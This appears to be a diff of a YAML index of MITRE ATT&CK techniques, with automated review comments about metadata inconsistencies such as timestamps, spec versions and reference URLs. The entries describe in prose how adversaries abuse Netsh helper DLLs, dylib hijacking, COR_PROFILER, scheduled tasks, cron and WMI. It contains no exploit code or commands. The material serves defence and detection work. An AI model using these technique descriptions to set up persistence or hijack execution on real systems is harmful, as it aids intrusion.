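Review bot: the `x_mitre_detection` text for the new T1546.017 entry lists three rule directories (`/etc/udev/rules.d/`, `/lib/udev/rules.d/`, `/usr/lib/udev/rules.d/`) while the description names five, leaving out `/run/udev/rules.d/` and `/usr/local/lib/udev/rules.d/`; `/run/udev/rules.d/` is the volatile runtime location, so a file-monitoring rule built from the detection string as written would miss a rule dropped there. Minor: the third path is not backticked like the other two, and the string has a trailing space before its closing quote (`2024) '`). These are upstream values (object `attack-pattern--f4c3f644-ab33-433d-8648-75cc03a95792`), so report them upstream and let the index mirror the fix. Also note the entry lands under `privilege-escalation` with `atomic_tests: []`, so nothing yet exercises the `RUN+=` abuse the description walks through.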
@@ -23827,7 +24148,7 @@ privilege-escalation:
Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.(Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at HKLM\SOFTWARE\Microsoft\Netsh
.
Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality.(Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T17:09:17.363Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Event Triggered Execution: Netsh Helper DLL'
x_mitre_detection: 'It is likely unusual for netsh.exe to have any child processes
@@ -23851,12 +24172,11 @@ privilege-escalation:
- SYSTEM
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.007
atomic_tests: []
T1574.004:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-03-30T21:01:39.601Z'
name: Dylib Hijacking
description: |-
Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with @rpath
, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable. Additionally, if weak linking is used, such as the LC_LOAD_WEAK_DYLIB
function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
@@ -23940,11 +24260,10 @@ privilege-escalation:
url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
T1078.003:
technique:
- modified: '2023-07-14T13:04:04.591Z'
+ modified: '2024-10-15T16:36:36.681Z'
name: 'Valid Accounts: Local Accounts'
description: "Adversaries may obtain and abuse credentials of a local account
as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -23996,9 +24315,8 @@ privilege-escalation:
external_id: T1078.003
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.003
atomic_tests: []
T1574.012:
@@ -24047,7 +24365,7 @@ privilege-escalation:
url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
Profilers. Retrieved June 24, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-30T21:35:12.049Z'
name: 'Hijack Execution Flow: COR_PROFILER'
description: |-
Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
@@ -24085,30 +24403,29 @@ privilege-escalation:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1574.012
atomic_tests: []
execution:
T1053.005:
technique:
- modified: '2023-11-15T14:33:53.354Z'
+ modified: '2024-10-13T16:13:47.770Z'
name: 'Scheduled Task/Job: Scheduled Task'
description: "Adversaries may abuse the Windows Task Scheduler to perform task
scheduling for initial or recurring execution of malicious code. There are
multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
utility can be run directly on the command line, or the Task Scheduler can
be opened through the GUI within the Administrator Tools section of the Control
- Panel. In some cases, adversaries have used a .NET wrapper for the Windows
- Task Scheduler, and alternatively, adversaries have used the Windows netapi32
- library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110)
- utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)),
- though at.exe
can not access tasks created with schtasks
- or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute
- programs at system startup or on a scheduled basis for persistence. The Windows
- Task Scheduler can also be abused to conduct remote Execution as part of Lateral
- Movement and/or to run a process under the context of a specified account
- (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
+ Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
+ wrapper for the Windows Task Scheduler, and alternatively, adversaries have
+ used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+ (WMI) to create a scheduled task. Adversaries may also utilize the Powershell
+ Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
+ create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
+ Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
+ system startup or on a scheduled basis for persistence. The Windows Task Scheduler
+ can also be abused to conduct remote Execution as part of Lateral Movement
+ and/or to run a process under the context of a specified account (such as
+ SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
adversaries have also abused the Windows Task Scheduler to potentially mask
one-time execution under signed/trusted system processes.(Citation: ProofPoint
Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
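Review bot: `- x_mitre_attack_spec_version: 2.1.0` for T1574.012 is removed with no replacement anywhere in this hunk, while every other entry in the diff keeps or bumps that key; check whether the upstream object really lacks it or the generator dropped it together with `spec_version`. In the T1053.005 description, the rewritten passage also drops the paragraph on the deprecated `at` utility (`though at.exe can not access tasks created with schtasks or the Control Panel`) while adding the `Invoke-CimMethod` / `PS_ScheduledTask` sentence and the `(Citation: Stack Overflow)` tag; fine if that is the upstream text, but worth a line in the commit message since the version only moves from `1.5` to `1.6`.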
@@ -24155,7 +24472,7 @@ execution:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.5'
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Creation'
- 'File: File Modification'
@@ -24187,8 +24504,8 @@ execution:
url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
- December 12, 2017.
- url: https://twitter.com/leoloobeek/status/939248813465853953
+ September 12, 2024.
+ url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Tarrask scheduled task
description: Microsoft Threat Intelligence Team & Detection and Response Team
. (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
@@ -24202,6 +24519,10 @@ execution:
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
+ - source_name: Red Canary - Atomic Red Team
+ description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
+ Task/Job: Scheduled Task. Retrieved June 19, 2024.'
+ url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
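Review bot: the new `Red Canary - Atomic Red Team` reference points at `blob/master/atomics/T1053.005/T1053.005.md`, an unpinned branch URL, and is dated `(n.d.)`; it is also this repository being cited as the source for the `Invoke-CimMethod` sentence added to the T1053.005 description. Harmless for the index, but if the link is meant to be stable the upstream reference should pin a commit (`blob/<sha>/...`) rather than `master`.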
@@ -24214,16 +24535,19 @@ execution:
description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
Task - Registry. Retrieved June 1, 2022.
url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
+ - source_name: Stack Overflow
+ description: Stack Overflow. (n.d.). How to find the location of the Scheduled
+ Tasks folder. Retrieved June 19, 2024.
+ url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.005
atomic_tests: []
T1047:
technique:
- modified: '2024-04-11T18:13:25.130Z'
+ modified: '2024-10-15T15:20:57.328Z'
name: Windows Management Instrumentation
description: |-
Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is designed for programmers and is the infrastructure for management data and operations on Windows systems.(Citation: WMI 1-3) WMI is an administration feature that provides a uniform environment to access Windows system components.
@@ -24289,7 +24613,6 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1047
atomic_tests: []
T1129:
@@ -24366,66 +24689,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1129
atomic_tests: []
T1059.007:
technique:
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Cody Thomas, SpecterOps
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d
- type: attack-pattern
- created: '2020-06-23T19:12:24.924Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1059.007
- url: https://attack.mitre.org/techniques/T1059/007
- - source_name: NodeJS
- url: https://nodejs.org/
- description: OpenJS Foundation. (n.d.). Node.js. Retrieved June 23, 2020.
- - source_name: JScrip May 2018
- url: https://docs.microsoft.com/windows/win32/com/translating-to-jscript
- description: Microsoft. (2018, May 31). Translating to JScript. Retrieved
- June 23, 2020.
- - source_name: Microsoft JScript 2007
- url: https://docs.microsoft.com/archive/blogs/gauravseth/the-world-of-jscript-javascript-ecmascript
- description: Microsoft. (2007, August 15). The World of JScript, JavaScript,
- ECMAScript …. Retrieved June 23, 2020.
- - source_name: Microsoft Windows Scripts
- url: https://docs.microsoft.com/scripting/winscript/windows-script-interfaces
- description: Microsoft. (2017, January 18). Windows Script Interfaces. Retrieved
- June 23, 2020.
- - source_name: Apple About Mac Scripting 2016
- url: https://developer.apple.com/library/archive/documentation/LanguagesUtilities/Conceptual/MacAutomationScriptingGuide/index.html
- description: Apple. (2016, June 13). About Mac Scripting. Retrieved April
- 14, 2021.
- - source_name: SpecterOps JXA 2020
- url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
- description: Pitt, L. (2020, August 6). Persistent JXA. Retrieved April 14,
- 2021.
- - source_name: SentinelOne macOS Red Team
- url: https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/
- description: 'Phil Stokes. (2019, December 5). macOS Red Team: Calling Apple
- APIs Without Building Binaries. Retrieved July 17, 2020.'
- - source_name: Red Canary Silver Sparrow Feb2021
- url: https://redcanary.com/blog/clipping-silver-sparrows-wings/
- description: 'Tony Lambert. (2021, February 18). Clipping Silver Sparrow’s
- wings: Outing macOS malware before it takes flight. Retrieved April 20,
- 2021.'
- - source_name: MDSec macOS JXA and VSCode
- url: https://www.mdsec.co.uk/2021/01/macos-post-exploitation-shenanigans-with-vscode-extensions/
- description: Dominic Chell. (2021, January 1). macOS Post-Exploitation Shenanigans
- with VSCode Extensions. Retrieved April 20, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-07-30T14:12:52.698Z'
name: 'Command and Scripting Interpreter: JavaScript'
description: |-
Adversaries may abuse various implementations of JavaScript for execution. JavaScript (JS) is a platform-independent scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser.(Citation: NodeJS)
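Review bot: the roughly fifty lines removed here for T1059.007 (`x_mitre_platforms`, `x_mitre_domains`, `x_mitre_contributors`, `id`, `created`, the whole `external_references` list) are all re-added in the next hunk with identical values, only in a different key order and with `description` and `url` swapped inside each reference; the substantive changes to this entry are the `modified` date and the field additions in the following hunk. Sorting keys on output would turn this into a ten-line diff and make the real changes reviewable.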
@@ -24438,31 +24706,83 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_contributors:
+ - Cody Thomas, SpecterOps
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for events associated with scripting execution, such as process activity, usage of the Windows Script Host (typically cscript.exe or wscript.exe), file activity involving scripts, or loading of modules associated with scripting languages (ex: JScript.dll). Scripting execution is likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for execution and subsequent behavior. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other programmable post-compromise behaviors and could be used as indicators of detection leading back to the source.
Monitor for execution of JXA through osascript
and usage of OSAScript
API that may be related to other suspicious behavior occurring on the system.
Understanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable related components running on a system would be considered suspicious. If scripting is not commonly used on a system, but enabled, execution running out of cycle from patching or other administrator functions is suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_version: '2.2'
x_mitre_data_sources:
- 'Module: Module Load'
- 'Process: Process Creation'
- 'Script: Script Execution'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- - Administrator
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d
+ created: '2020-06-23T19:12:24.924Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1059/007
+ external_id: T1059.007
+ - source_name: Apple About Mac Scripting 2016
+ description: Apple. (2016, June 13). About Mac Scripting. Retrieved April
+ 14, 2021.
+ url: https://developer.apple.com/library/archive/documentation/LanguagesUtilities/Conceptual/MacAutomationScriptingGuide/index.html
+ - source_name: MDSec macOS JXA and VSCode
+ description: Dominic Chell. (2021, January 1). macOS Post-Exploitation Shenanigans
+ with VSCode Extensions. Retrieved April 20, 2021.
+ url: https://www.mdsec.co.uk/2021/01/macos-post-exploitation-shenanigans-with-vscode-extensions/
+ - source_name: Microsoft JScript 2007
+ description: Microsoft. (2007, August 15). The World of JScript, JavaScript,
+ ECMAScript …. Retrieved June 23, 2020.
+ url: https://docs.microsoft.com/archive/blogs/gauravseth/the-world-of-jscript-javascript-ecmascript
+ - source_name: Microsoft Windows Scripts
+ description: Microsoft. (2017, January 18). Windows Script Interfaces. Retrieved
+ June 23, 2020.
+ url: https://docs.microsoft.com/scripting/winscript/windows-script-interfaces
+ - source_name: JScrip May 2018
+ description: Microsoft. (2018, May 31). Translating to JScript. Retrieved
+ June 23, 2020.
+ url: https://docs.microsoft.com/windows/win32/com/translating-to-jscript
+ - source_name: NodeJS
+ description: OpenJS Foundation. (n.d.). Node.js. Retrieved June 23, 2020.
+ url: https://nodejs.org/
+ - source_name: SentinelOne macOS Red Team
+ description: 'Phil Stokes. (2019, December 5). macOS Red Team: Calling Apple
+ APIs Without Building Binaries. Retrieved July 17, 2020.'
+ url: https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/
+ - source_name: SpecterOps JXA 2020
+ description: Pitt, L. (2020, August 6). Persistent JXA. Retrieved April 14,
+ 2021.
+ url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
+ - source_name: Red Canary Silver Sparrow Feb2021
+ description: 'Tony Lambert. (2021, February 18). Clipping Silver Sparrow’s
+ wings: Outing macOS malware before it takes flight. Retrieved April 20,
+ 2021.'
+ url: https://redcanary.com/blog/clipping-silver-sparrows-wings/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1059.007
atomic_tests: []
T1053.007:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:26:03.731Z'
name: Kubernetes Cronjob
description: |-
Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
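Review bot: `x_mitre_permissions_required` (User, Administrator, SYSTEM) is dropped from T1059.007 while `x_mitre_remote_support: false`, `revoked: false` and `x_mitre_deprecated: false` are added, yet T1574.012 above still carries `x_mitre_permissions_required`; any consumer of that field now sees it for some techniques and not others. That is consistent with ATT&CK retiring the field per object, but it deserves a commit-message note. The reference `source_name: JScrip May 2018` also keeps the upstream typo (`JScrip`); since descriptions cite sources by `source_name`, correct it upstream together with the citation tag rather than in the index.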
@@ -24520,9 +24840,8 @@ execution:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.007
atomic_tests: []
T1559.002:
@@ -24614,20 +24933,19 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1559.002
atomic_tests: []
T1204.002:
technique:
- modified: '2023-04-21T12:22:19.740Z'
+ modified: '2024-09-25T20:50:34.876Z'
name: 'User Execution: Malicious File'
description: "An adversary may rely upon a user opening a malicious file in
order to gain execution. Users may be subjected to social engineering to get
them to open a file that will lead to code execution. This user action will
typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).
Adversaries may use several types of files that require a user to execute
- them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl.\n\nAdversaries
- may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036)
+ them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, .cpl, and
+ .reg.\n\nAdversaries may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036)
and [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027)
to increase the likelihood that a user will open and successfully execute
a malicious file. These methods may include using a familiar naming convention
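Review bot: T1559.002 keeps `x_mitre_attack_spec_version: 3.1.0` (unchanged context near the top of this hunk) while its `spec_version: '2.1'` line is deleted and its `modified` timestamp is left alone; every other object in this patch that loses `spec_version` is bumped to 3.2.0 in the same hunk. If the upstream STIX object really is still at 3.1.0 this is fine, otherwise the regeneration picked up a stale copy for this one technique and it should be re-run. The `.reg` addition to the T1204.002 file-type list is consistent with the `modified` bump and with the 1.3 to 1.4 version bump in the next hunk.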
@@ -24655,7 +24973,7 @@ execution:
- Linux
- macOS
- Windows
- x_mitre_version: '1.3'
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'File: File Creation'
@@ -24675,33 +24993,13 @@ execution:
url: https://www.bleepingcomputer.com/news/security/psa-dont-open-spam-containing-password-protected-word-docs/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1204.002
atomic_tests: []
T1053.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
- type: attack-pattern
- created: '2019-12-03T14:25:00.538Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1053.003
- url: https://attack.mitre.org/techniques/T1053/003
- - source_name: 20 macOS Common Tools and Techniques
- url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
- description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
- Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-10-15T18:45:51.945Z'
name: 'Scheduled Task/Job: Cron'
description: "Adversaries may abuse the cron
utility to perform
task scheduling for initial or recurring execution of malicious code.(Citation:
@@ -24718,6 +25016,7 @@ execution:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor scheduled task creation from common utilities using
command-line invocation. Legitimate scheduled tasks may be created during
installation of new software or through system administration functions. Look
@@ -24728,9 +25027,13 @@ execution:
part of a chain of behavior that could lead to other activities, such as network
connections made for Command and Control, learning details about the environment
through Discovery, and Lateral Movement. "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'File: File Modification'
- 'Process: Process Creation'
@@ -24738,8 +25041,24 @@ execution:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
+ created: '2019-12-03T14:25:00.538Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1053/003
+ external_id: T1053.003
+ - source_name: 20 macOS Common Tools and Techniques
+ description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+ Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+ url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1053.003
atomic_tests: []
T1559.001:
@@ -24779,7 +25098,7 @@ execution:
description: Nelson, M. (2017, January 5). Lateral Movement using the MMC20
Application COM Object. Retrieved November 21, 2017.
source_name: Enigma MMC20 COM Jan 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-07-26T22:51:20.448Z'
name: Component Object Model
description: |-
Adversaries may use the Windows Component Object Model (COM) for local code execution. COM is an inter-process communication (IPC) component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces.(Citation: Fireeye Hunting COM June 2019) Through COM, a client object can call methods of server objects, which are typically binary Dynamic Link Libraries (DLL) or executables (EXE).(Citation: Microsoft COM) Remote COM execution is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019)
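Review bot: the `modified` timestamp for T1559.001 moves backwards, from `2022-04-25T14:00:00.188Z` to `2021-07-26T22:51:20.448Z`. A regenerated index should not regress an upstream `modified` value unless MITRE itself corrected the timestamp, so please confirm which bundle this was generated from; a stale source would also explain the field removals for the same object in the next hunk.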
@@ -24804,12 +25123,10 @@ execution:
- 'Script: Script Execution'
- 'Process: Process Creation'
x_mitre_remote_support: true
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1053:
technique:
- modified: '2024-03-01T15:29:46.832Z'
+ modified: '2024-10-15T15:14:03.453Z'
name: Scheduled Task/Job
description: |-
Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
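Review bot: for T1559.001 both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` are deleted and nothing is added in their place; the hunk shows `atomic_tests: []` immediately after the deletion, so unless the key is re-emitted elsewhere in the object this technique ends up with no attack-spec version at all. Everywhere else in the patch the `spec_version` removal is paired with a `+ x_mitre_attack_spec_version: 3.2.0`; T1559.001 should get the same treatment, or the reason for the difference should be noted in the commit message.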
@@ -24889,11 +25206,10 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1059.002:
technique:
- modified: '2024-03-01T19:06:05.126Z'
+ modified: '2024-10-15T14:18:20.087Z'
name: 'Command and Scripting Interpreter: AppleScript'
description: |-
Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.(Citation: Apple AppleScript) These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.
@@ -24953,12 +25269,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059.002
atomic_tests: []
T1106:
technique:
- modified: '2023-10-13T16:01:07.538Z'
+ modified: '2024-09-12T15:25:57.058Z'
name: Native API
description: |-
Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
@@ -25056,9 +25371,9 @@ execution:
2021.
url: https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/
- source_name: Microsoft CreateProcess
- description: Microsoft. (n.d.). CreateProcess function. Retrieved December
- 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms682425
+ description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
- source_name: Microsoft Win32
description: Microsoft. (n.d.). Programming reference for the Win32 API. Retrieved
March 15, 2020.
@@ -25075,19 +25390,18 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1106
atomic_tests: []
T1059.010:
technique:
- modified: '2024-04-10T16:05:22.456Z'
+ modified: '2024-04-28T15:58:48.119Z'
name: AutoHotKey & AutoIT
description: |-
